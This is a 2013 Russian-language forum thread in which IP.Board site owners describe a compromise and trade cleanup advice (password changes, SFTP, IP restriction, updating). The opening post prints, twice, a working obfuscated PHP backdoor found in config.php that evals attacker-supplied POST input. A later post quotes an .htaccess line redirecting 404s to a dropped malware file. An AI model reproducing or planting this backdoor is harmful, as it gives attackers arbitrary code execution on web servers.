Posted 9 марта, 201311 yr comment_23109 Привет всем.Сегодня приехал домой,зашел на свои сайты,и на одном из них была ошибка Notice: Use of undefined constant w1111t - assumed 'w1111t' in /var/www/data/www/bans.rgmix.eu/config.php on line 1 Решил заглянуть в этот файл и увидел строчку if(isset($_GET[w1111t])){ $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d); } Ладно. Также на некоторых сайтах появился файл wp-conf.php с содержанием: код слишком большой,прикреплю файл wp-conf.php Файл был загружен сегодня 3 часа назад... Что это такое? И как с этим бороться??? upd#: На всех сайтах в конфигурационных файлах (на разных сайтах) добавлена подобная строчка и лежит этот файл wp-conf.php (аваст на него ругается) if(isset($_GET[w9345t])){ $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d); } Edited 9 марта, 201311 yr by HooLIGUN Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/ Share on other sites Больше вариантов
9 марта, 201311 yr comment_23111 Да, это взлом. Скорее всего взломали FTP аккаунт. Срочно меняй все пароли. Используй SFTP для соединения с сервером. Проверь комп на вирусы. Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23111 Share on other sites Больше вариантов
9 марта, 201311 yr Author comment_23112 Используй SFTP для соединения с сервером. Только им и пользуюсь. Сейчас буду менять. А не подскажешь где можно посмотреть логи? А то я незнаю где они находятся на vds`e Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23112 Share on other sites Больше вариантов
9 марта, 201311 yr Author comment_23114 Теперь зараженные файлы еще искать... Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23114 Share on other sites Больше вариантов
9 марта, 201311 yr comment_23115 /var/log/apache2 Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23115 Share on other sites Больше вариантов
9 марта, 201311 yr Author comment_23120 /var/log/apache2 Эх..тут ничего не нашел... Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23120 Share on other sites Больше вариантов
9 марта, 201311 yr Author comment_23124 Нашел логи в папке с юзера (меня) 31.133.47.233 Вот эта тварь ко мне ломилась Ух я зол Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23124 Share on other sites Больше вариантов
9 марта, 201311 yr comment_23128 В этом случае ничего со злоумышленником не поделать, меняй пароли и устраняй последствия взлома.. Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23128 Share on other sites Больше вариантов
13 марта, 201311 yr Author comment_23774 О даа...Опять подобные файлы лежат в корнях сайтов... Пол часа назад залитые...еще сделать ничего не успели видимо... Как так? Пароли везде были сгенерированны. Где то есть дырка,но как ее найти? Явно по фтп юзера заходят,т.к ниже этого /var/www/hooligun/data каталога у них доступа нет... Edited 13 марта, 201311 yr by HooLIGUN Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23774 Share on other sites Больше вариантов
17 марта, 201311 yr comment_23998 Может тогда лучше написать хостеру ? Чтобы блоканули доступ к фтп по IP ? Или пускай они у себя ищут дыры... Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=23998 Share on other sites Больше вариантов
18 марта, 201311 yr comment_24083 Самый верный способ - открыть доступ на сервер с одного IP. Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=24083 Share on other sites Больше вариантов
18 марта, 201311 yr comment_24119 Есть форум пока не развивающийся, зашел на хост дабы залить файл и заметил что-то непривычное.. В корне сайта файлы wp-conf.php, wp-kvwotp.php, wp-skrxzqc.php и несколько других. Также изменен .htaccess: ErrorDocument 404 /wp-kvwotp.php Также в корне папка .zz В ней несколько файлов с рандомными названия содержанием : O:8:"stdClass":3:{s:6:"status";s:22:"HTTP/1.1 404 Not Found";s:11:"contentType";s:10:" text/html";s:7:"content";s:570:"<html> <head><title>404 Not Found</title></head> <body bgcolor="white"> <center><h1>404 Not Found</h1></center> <hr><center>nginx/1.2.7</center> </body> </html> <!-- a padding to disable MSIE and Chrome friendly error page --> <!-- a padding to disable MSIE and Chrome friendly error page --> <!-- a padding to disable MSIE and Chrome friendly error page --> <!-- a padding to disable MSIE and Chrome friendly error page --> <!-- a padding to disable MSIE and Chrome friendly error page --> <!-- a padding to disable MSIE and Chrome friendly error page --> ";} И файлы pollIria.php, Qpoll.php, schedulexDq.php, Rlogoff.php Последний похож на Shell (раньше shell'ов никогда не видел, поэтому могу ошибаться..). Так как форум сейчас простаивает, то файлы с февраля не изменялись и я все мартовские файлы удалил, но "он" опять их залил.. Что больше всего меня пугает - wp-conf.php был у меня в самом корне хостинга.. Все мартовские файлы удалил, пока вроде бы чисто.. Сейчас пароли сменю.. Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=24119 Share on other sites Больше вариантов
19 марта, 201311 yr comment_24271 Нужно всегда обновляться до последней версии. Не один раз об этом говорили. Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=24271 Share on other sites Больше вариантов
22 марта, 201311 yr comment_24613 Видел такое на сайтах одного клиента, удалил все файлы кроме контента пользователей, вычистил все оставшиеся php файлы и обновил форум (вирусятина встречалась почти в каждой папке а также была втроена в некоторые файлы, например в файл конфига) Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=24613 Share on other sites Больше вариантов
22 марта, 201311 yr comment_24614 Нашел логи в папке с юзера (меня) 31.133.47.233 Вот эта тварь ко мне ломилась Снимок.PNG Ух я зол Некоторые дыры закрываются путём обновления форума. Может всётаки пришло и твоё время? 3.3 давно ведь не актуальная версия. Respected: правильно ведь? Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=24614 Share on other sites Больше вариантов
23 марта, 201311 yr comment_24653 Да, для 3.3.x уже шелл давно в сети появился. Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=24653 Share on other sites Больше вариантов
23 марта, 201311 yr Author comment_24658 Death1, Да я уже обновился. Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=24658 Share on other sites Больше вариантов
8 апреля, 201311 yr comment_26767 Здравствуйте, у меня такая же проблема была и есть, уже давно мучает, хостер блокирует форум из-за этого а вычищаю все что могу, они включают и все заного по кругу, потом думал что поможет обновление, 3.2.3 у меня, но связи с тем что с базой не получилось при установке последней версии, пришлось опять ту же самую ставить, но вопрос тут по БД не сюда наверное. я так понимаю, проблему это решить можно только с обновлением? Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=26767 Share on other sites Больше вариантов
8 апреля, 201311 yr Author comment_26781 Здравствуйте, у меня такая же проблема была и есть, уже давно мучает, хостер блокирует форум из-за этого а вычищаю все что могу, они включают и все заного по кругу, потом думал что поможет обновление, 3.2.3 у меня, но связи с тем что с базой не получилось при установке последней версии, пришлось опять ту же самую ставить, но вопрос тут по БД не сюда наверное. я так понимаю, проблему это решить можно только с обновлением? Решил проблему (Ну по крайней мере теперь все нормально) отключив пользователю доступ к Shell Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=26781 Share on other sites Больше вариантов
8 апреля, 201311 yr comment_26787 Решил проблему (Ну по крайней мере теперь все нормально) отключив пользователю доступ к Shell Вы это сделали посредством htacess? можете ваш код мне дать у меня вообще щас этого файла нету в корневой директории Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=26787 Share on other sites Больше вариантов
8 апреля, 201311 yr Author comment_26791 Вы это сделали посредством htacess? можете ваш код мне дать у меня вообще щас этого файла нету в корневой директории Я это сделал в панеле ISPManager Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=26791 Share on other sites Больше вариантов
11 апреля, 201311 yr comment_27237 Такая же фигня наблюдается. Хостуюсь на бесплатном хостинге, который не в первый раз блокирует мне аккаунт из-за такого скрипта. Он мне конкретно засрал корень, залив туда всякие-разные папки Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=27237 Share on other sites Больше вариантов
11 апреля, 201311 yr comment_27243 Бесплатного хостинга сторожиться надо, а не сидеть на нём Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=27243 Share on other sites Больше вариантов
16 апреля, 201311 yr comment_27886 Это из-за shell'а в версии ip.board, как я понимаю? Нужно обновляться? Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=27886 Share on other sites Больше вариантов
16 апреля, 201311 yr Author comment_27889 eeadlo,Нужно всегда обновляться до актуальной версии. Link to comment https://ipbmafia.ru/topic/3276-wp-confphp-vzlom/?&do=findComment&comment=27889 Share on other sites Больше вариантов
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.